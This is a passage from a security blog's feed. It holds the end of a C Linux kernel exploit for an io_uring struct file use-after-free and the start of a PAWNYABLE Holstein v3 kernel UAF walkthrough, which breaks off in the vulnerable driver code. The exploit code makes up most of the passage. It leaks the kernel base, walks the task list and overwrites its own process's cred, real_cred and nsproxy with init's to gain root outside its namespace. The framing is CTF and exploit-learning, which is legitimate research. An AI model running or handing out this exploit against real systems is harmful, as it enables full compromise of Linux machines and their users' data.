    <span class="kt">uint64_t</span> <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span> 
        <span class="n">err</span><span class="p">(</span><span class="s">"Invalid task after init: 0x%lx"</span><span class="p">,</span> <span class="n">current</span><span class="p">);</span>    
    <span class="p">}</span>

    <span class="c1">// Read the comm</span>
    <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
    <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

    <span class="c1">// While we don't have NULL, traverse the list</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">current_next</span><span class="p">);</span>
        <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">current</span> <span class="o">==</span> <span class="n">g_init_task</span><span class="p">)</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Read the comm</span>
        <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
        <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

        <span class="c1">// If we find the target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_target_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// If we find our target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_our_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">find_pipe_buf_addr</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Get the base of the files array</span>
    <span class="kt">uint64_t</span> <span class="n">files_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_file_array</span><span class="p">);</span>
    
    <span class="c1">// Adjust the files_ptr to point to our fd in the array</span>
    <span class="n">files_ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="n">g_uaf_fd</span><span class="p">);</span>

    <span class="c1">// Get the address of our UAF file struct</span>
    <span class="kt">uint64_t</span> <span class="n">curr_file</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">files_ptr</span><span class="p">);</span>

    <span class="c1">// Calculate the offset</span>
    <span class="n">g_off</span> <span class="o">=</span> <span class="n">curr_file</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">;</span>

    <span class="c1">// Set the globals</span>
    <span class="n">g_file_addr</span> <span class="o">=</span> <span class="n">curr_file</span><span class="p">;</span>
    <span class="n">g_pipe_buf</span> <span class="o">=</span> <span class="n">g_file_addr</span> <span class="o">-</span> <span class="n">g_off</span><span class="p">;</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">make_ring_copy</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Get the base of the files array</span>
    <span class="kt">uint64_t</span> <span class="n">files_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_file_array</span><span class="p">);</span>
    
    <span class="c1">// Adjust the files_ptr to point to our ring fd in the array</span>
    <span class="n">files_ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="n">g_ring</span><span class="p">.</span><span class="n">ring_fd</span><span class="p">);</span>

    <span class="c1">// Get the address of our UAF file struct</span>
    <span class="kt">uint64_t</span> <span class="n">curr_file</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">files_ptr</span><span class="p">);</span>

    <span class="c1">// Copy all the data into the buffer</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">32</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">val_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">g_ring_copy</span><span class="p">[</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">];</span>
        <span class="o">*</span><span class="n">val_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">curr_file</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">8</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Here, all we're doing is determing what side of the page the UAF file is on,</span>
<span class="c1">// if its on the front half of the page, the back half is our scratch space</span>
<span class="c1">// and vice versa</span>
<span class="kt">void</span> <span class="nf">set_scratch_space</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">g_scratch</span> <span class="o">=</span> <span class="n">g_pipe_buf</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_off</span> <span class="o">&lt;</span> <span class="mh">0x500</span><span class="p">)</span> <span class="p">{</span> <span class="n">g_scratch</span> <span class="o">+=</span> <span class="mh">0x500</span><span class="p">;</span> <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// We failed cross-cache stage, either because we didnt replace UAF object</span>
<span class="kt">void</span> <span class="nf">cc_fail</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">cc_reset</span><span class="p">();</span>
    <span class="n">close</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">);</span>
    <span class="n">g_uaf_fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="n">release_pipe</span><span class="p">();</span>
    <span class="n">create_pipe</span><span class="p">();</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">write_pipe</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`write()` failed"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span>
<span class="p">{</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Setting up exploit environment..."</span><span class="p">);</span>
    <span class="n">setup_env</span><span class="p">();</span>

    <span class="c1">// Create a debug buffer</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="sc">'A'</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span> 

<span class="nl">retry_cc:</span>
    <span class="c1">// Do cross-cache attempt</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Attempting cross-cache..."</span><span class="p">);</span>
    <span class="n">do_cc</span><span class="p">();</span>

    <span class="c1">// Replace UAF file (and page) with pipe page</span>
    <span class="n">write_pipe</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>

    <span class="c1">// Try to `lseek()` which should fail if we succeeded</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">lseek</span><span class="p">(</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SEEK_SET</span><span class="p">)</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"[!] Cross-cache failed, retrying..."</span><span class="p">);</span>
        <span class="n">cc_fail</span><span class="p">();</span>
        <span class="k">goto</span> <span class="n">retry_cc</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Success</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Cross-cache succeeded"</span><span class="p">);</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>

    <span class="c1">// Leak the `error_entry` pointer</span>
    <span class="kt">uint64_t</span> <span class="n">error_entry</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">ERROR_ENTRY_ADDR</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Leaked `error_entry` address: 0x%lx"</span><span class="p">,</span> <span class="n">error_entry</span><span class="p">);</span>

    <span class="c1">// Make sure it seems kernel-ish</span>
    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">error_entry</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">!=</span> <span class="mh">0xFFFF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Weird `error_entry` address: 0x%lx"</span><span class="p">,</span> <span class="n">error_entry</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set kernel base</span>
    <span class="n">g_kern_base</span> <span class="o">=</span> <span class="n">error_entry</span> <span class="o">-</span> <span class="n">EE_OFF</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Kernel base: 0x%lx"</span><span class="p">,</span> <span class="n">g_kern_base</span><span class="p">);</span>

    <span class="c1">// Read 8 bytes at that address and see if they match our signature</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_kern_base</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">sig</span> <span class="o">!=</span> <span class="n">KERNEL_SIGNATURE</span><span class="p">)</span> 
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad kernel signature: 0x%lx"</span><span class="p">,</span> <span class="n">sig</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Set init_task</span>
    <span class="n">g_init_task</span> <span class="o">=</span> <span class="n">g_kern_base</span> <span class="o">+</span> <span class="n">INIT_OFF</span><span class="p">;</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"init_task @ 0x%lx"</span><span class="p">,</span> <span class="n">g_init_task</span><span class="p">);</span>

    <span class="c1">// Get the cred and nsproxy values</span>
    <span class="n">g_cred_what</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">CRED_OFF</span><span class="p">);</span>
    <span class="n">g_nsproxy_what</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">NSPROXY_OFF</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">g_cred_what</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">!=</span> <span class="mh">0xFFFF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Weird init-&gt;cred value: 0x%lx"</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">((</span><span class="kt">uint16_t</span><span class="p">)(</span><span class="n">g_nsproxy_what</span> <span class="o">&gt;&gt;</span> <span class="mi">48</span><span class="p">)</span> <span class="o">!=</span> <span class="mh">0xFFFF</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Weird init-&gt;nsproxy value: 0x%lx"</span><span class="p">,</span> <span class="n">g_nsproxy_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"init cred address: 0x%lx"</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"init nsproxy address: 0x%lx"</span><span class="p">,</span> <span class="n">g_nsproxy_what</span><span class="p">);</span>

    <span class="c1">// Traverse the tasks list</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Traversing tasks linked list..."</span><span class="p">);</span>
    <span class="n">traverse_tasks</span><span class="p">();</span>

    <span class="c1">// Check to see if we succeeded</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_target_task</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Unable to find target task!"</span><span class="p">);</span> <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_our_task</span><span class="p">)</span>    <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Unable to find our task!"</span><span class="p">);</span> <span class="p">}</span>

    <span class="c1">// We found the target task</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Found '%s' task @ 0x%lx"</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">,</span> <span class="n">g_target_task</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Found '%s' task @ 0x%lx"</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">,</span> <span class="n">g_our_task</span><span class="p">);</span>

    <span class="c1">// Set where gadgets</span>
    <span class="n">g_cred_where</span> <span class="o">=</span> <span class="n">g_target_task</span> <span class="o">+</span> <span class="n">CRED_OFF</span><span class="p">;</span>
    <span class="n">g_real_cred_where</span> <span class="o">=</span> <span class="n">g_target_task</span> <span class="o">+</span> <span class="n">REAL_CRED_OFF</span><span class="p">;</span>
    <span class="n">g_nsproxy_where</span> <span class="o">=</span> <span class="n">g_target_task</span> <span class="o">+</span> <span class="n">NSPROXY_OFF</span><span class="p">;</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Target cred @ 0x%lx"</span><span class="p">,</span> <span class="n">g_cred_where</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Target real_cred @ 0x%lx"</span><span class="p">,</span> <span class="n">g_real_cred_where</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Target nsproxy @ 0x%lx"</span><span class="p">,</span> <span class="n">g_nsproxy_where</span><span class="p">);</span>

    <span class="c1">// Locate our file descriptor table</span>
    <span class="n">g_files</span> <span class="o">=</span> <span class="n">g_our_task</span> <span class="o">+</span> <span class="n">FILES_OFF</span><span class="p">;</span>
    <span class="n">g_fdt</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_files</span><span class="p">)</span> <span class="o">+</span> <span class="n">FDT_OFF</span><span class="p">;</span>
    <span class="n">g_file_array</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_fdt</span><span class="p">)</span> <span class="o">+</span> <span class="n">FD_ARRAY_OFF</span><span class="p">;</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Our files @ 0x%lx"</span><span class="p">,</span> <span class="n">g_files</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Our file descriptor table @ 0x%lx"</span><span class="p">,</span> <span class="n">g_fdt</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Our file array @ 0x%lx"</span><span class="p">,</span> <span class="n">g_file_array</span><span class="p">);</span>

    <span class="c1">// Find our pipe address</span>
    <span class="n">find_pipe_buf_addr</span><span class="p">();</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"UAF file addr: 0x%lx"</span><span class="p">,</span> <span class="n">g_file_addr</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Pipe buffer addr: 0x%lx"</span><span class="p">,</span> <span class="n">g_pipe_buf</span><span class="p">);</span>

    <span class="c1">// Set the global scratch space side of the page</span>
    <span class="n">set_scratch_space</span><span class="p">();</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Scratch space base @ 0x%lx"</span><span class="p">,</span> <span class="n">g_scratch</span><span class="p">);</span>

    <span class="c1">// Make a copy of our real io_uring file descriptor since we need to fake</span>
    <span class="c1">// one</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Making copy of legitimate io_uring fd..."</span><span class="p">);</span>
    <span class="n">make_ring_copy</span><span class="p">();</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Copy done"</span><span class="p">);</span>

    <span class="c1">// Overwrite our task's cred with init's</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting our cred with init's..."</span><span class="p">);</span>
    <span class="n">overwrite_cred</span><span class="p">();</span>

    <span class="c1">// Make sure it's correct</span>
    <span class="kt">uint64_t</span> <span class="n">check_cred</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_cred_where</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">check_cred</span> <span class="o">!=</span> <span class="n">g_cred_what</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"check_cred: 0x%lx != g_cred_what: 0x%lx"</span><span class="p">,</span>
            <span class="n">check_cred</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite our real_cred with init's cred</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting our real_cred with init's..."</span><span class="p">);</span>
    <span class="n">overwrite_real_cred</span><span class="p">();</span>

    <span class="c1">// Make sure it's correct</span>
    <span class="n">check_cred</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_real_cred_where</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">check_cred</span> <span class="o">!=</span> <span class="n">g_cred_what</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"check_cred: 0x%lx != g_cred_what: 0x%lx"</span><span class="p">,</span> <span class="n">check_cred</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite our nsproxy with init's</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting our nsproxy with init's..."</span><span class="p">);</span>
    <span class="n">overwrite_nsproxy</span><span class="p">();</span>

    <span class="c1">// Make sure it's correct</span>
    <span class="n">check_cred</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_nsproxy_where</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">check_cred</span> <span class="o">!=</span> <span class="n">g_nsproxy_what</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"check_rec: 0x%lx != g_nsproxy_what: 0x%lx"</span><span class="p">,</span>
            <span class="n">check_cred</span><span class="p">,</span> <span class="n">g_nsproxy_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Creds and namespace look good!"</span><span class="p">);</span>
    
    <span class="c1">// Let the child loose</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">g_shmem</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>

    <span class="n">sleep</span><span class="p">(</span><span class="mi">3000</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux kernel" /><category term="Pwn" /><category term="UAF" /><category term="Tutorial" /><category term="CTF" /><category term="Walkthrough" /><summary type="html"><![CDATA[Introduction I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.]]></summary></entry><entry><title type="html">PAWNYABLE UAF Walkthrough (Holstein v3)</title><link href="https://h0mbre.github.io/PAWNYABLE_UAF_Walkthrough/" rel="alternate" type="text/html" title="PAWNYABLE UAF Walkthrough (Holstein v3)" /><published>2022-10-29T00:00:00+00:00</published><updated>2022-10-29T00:00:00+00:00</updated><id>https://h0mbre.github.io/PAWNYABLE_UAF_Walkthrough</id><content type="html" xml:base="https://h0mbre.github.io/PAWNYABLE_UAF_Walkthrough/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago <a href="https://twitter.com/ptrYudai">@ptrYudai</a> from <a href="https://twitter.com/zer0pts">@zer0pts</a> tweeted that they released the beta version of their website <a href="https://pawnyable.cafe/">PAWNYABLE!</a>, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.</p>

<p>The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.</p>

<h2 id="what-i-started-with">What I Started With</h2>

<p>PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and you’re first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).</p>

<p>I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but starting gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually lead to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated) , I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.</p>

<p>The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.</p>

<p>So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.</p>

<h2 id="what-i-did">What I Did</h2>

<p>To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):</p>

<ul>
  <li>Introduction to kernel exploits</li>
  <li>kernel debugging with gdb</li>
  <li>security mechanism (Overview of Exploitation Mitigations)</li>
  <li>Compile and transfer exploits (working with the kernel image)</li>
</ul>

<p>This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, its basically just copy pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).</p>

<p>Next, I started working on the first challenge which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges like <code class="language-plaintext highlighter-rouge">prepare_kernel_creds</code> and <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<p>You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.</p>

<p>After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from <a href="https://twitter.com/_lkmidas">@_lkmidas</a>:</p>

<ul>
  <li><a href="https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/">Learning Kernel Exploitation - Part 1</a></li>
  <li><a href="https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/">Learning Kernel Exploitation - Part 2</a></li>
  <li><a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/">Learning Kernel Exploitation - Part 3</a></li>
</ul>

<p>This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.</p>

<p>As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: <a href="https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/">overwriting <code class="language-plaintext highlighter-rouge">modprobe_path</code></a>.</p>

<p>After all this, I felt like I had a good enough base to get started on the UAF challenge.</p>

<h2 id="uaf-challenge-holstein-v3">UAF Challenge: Holstein v3</h2>

<p>Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="o">*</span><span class="n">g_buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">module_open</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_open called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="n">g_buf</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="n">BUFFER_SIZE</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"kmalloc failed"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>When we open the kernel driver, <code class="language-plaintext highlighter-rouge">char *g_buf</code> gets assigned the result of a call to <code class="language-plaintext highlighter-rouge">kzalloc()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">module_close</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span>
<span class="p">{</span>
